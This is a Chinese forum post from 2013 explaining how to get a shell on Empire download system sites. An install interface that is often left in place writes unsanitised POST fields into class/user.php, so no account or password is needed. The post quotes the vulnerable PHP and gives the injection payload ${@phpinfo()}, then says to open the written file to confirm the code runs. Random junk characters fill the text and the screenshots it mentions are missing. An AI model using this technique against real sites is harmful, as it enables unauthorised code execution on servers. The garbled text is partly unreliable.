这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们4 [/ \# z; F$ e
) H5 T5 p3 V2 I9 |* G) ?
/ D5 {" g+ t: B6 K2 R( r这是帝国的一套下载系统 如图2 o! m+ B2 j1 p6 `
ps(不需要任何账户和密码,直接写shell)
( k _' N0 O2 ?
由于很多站是由于下载要整合discuz 等等一些论坛....
. p9 ~* W6 V$ p& f 1 d c1 {- P. _
而帝国他又有一个万能接口,如图
! L1 F, ?3 o% ]* w+ C2 G, Y- y' _+ G3 g9 j% \3 z: k
. j6 h' }# M- q$ r( I
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
+ v! F0 A0 I3 N; p3 ?9 Y9 I6 j5 |
% [( c4 I, h: y1 a3 T: K当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪+ m6 v9 E5 u: A% B! J
. T, m' o R- _在data/fun.php中的15行
- ?) N/ A9 O3 I9 z# c# d% Q6 S+ ~; c8 W. J( B' U3 [" |3 [; M
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {2 T0 x @" Z8 B( v' J8 x) ]
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
/ l* }. C) m/ t( t# Y
8 Q; J# G8 S9 {5 u9 {这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);; y7 m8 Q0 @3 Q4 y, _
( i1 v+ a6 ~; ` k( u/ y他将传进来的变量进行了切割,然后赋给了$filetext
/ E, U; E; E2 `) p `) N- d% u
' N0 ? r2 O2 b+ |8 m- ?) z$ h8 P然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了3 T# J f' ?5 _; T1 e
5 r2 ]) _+ l/ `' L5 i \. q我们看看写入的结果,随便填一个
8 f' s! x" {- }9 P7 f! s, y0 Y# A: ^5 s; J* n2 k. I1 G
. E* j2 X0 e" y, l* ~3 c2 Q3 k: o" ^' S, f
$ w: O1 R, E+ o
. H" ^1 ?6 s1 v
! v5 A& I* E/ `# U# _ m3 T5 A2 n; Z& j% _0 J$ j
7 ^& f& `, W8 [/ p
" E4 P0 Z, j: ~/ O* _
6 \8 f! T; A( p1 R2 v0 G, t
% [/ W: z; l* F& F% ]
2 A4 F) c- ]3 J$ P) |* d" f
5 H! R1 g& u$ K) A x6 O7 `7 S+ R( @; O* J2 J. U
. R6 ?7 D3 o# P$ W
+ F% m/ R5 D1 P$ s- c8 [: Z
, z. {1 t! z7 p. `6 ?9 [' m( C: h9 X/ n" z9 }- X& H2 ^
2 ]3 U- E; x% w6 g5 z3 ^5 j) A, A
) v' |" G3 I' ~4 u所以我们淫荡点,写个${@phpinfo()}试试 / ] V0 G; X2 e# d8 S% H5 q
然后访问以下class/user.php这个文件
4 L! P4 i8 u0 [& R! F日了吧
6 O/ |. |5 R# o. y( Y' a) Z
$ |1 S1 \, [6 y! Z. r3 P3 H' G$ Q5 n Z9 l' K
7 g8 c& B, k9 B* d; Z. H2 X6 K
- ^) U7 l( m/ W! n' a* Q& b( L4 A2 c
9 O7 v3 p, F2 }" h8 Q | 
发表于 2013-1-23 09:34:37
收藏
支持
反对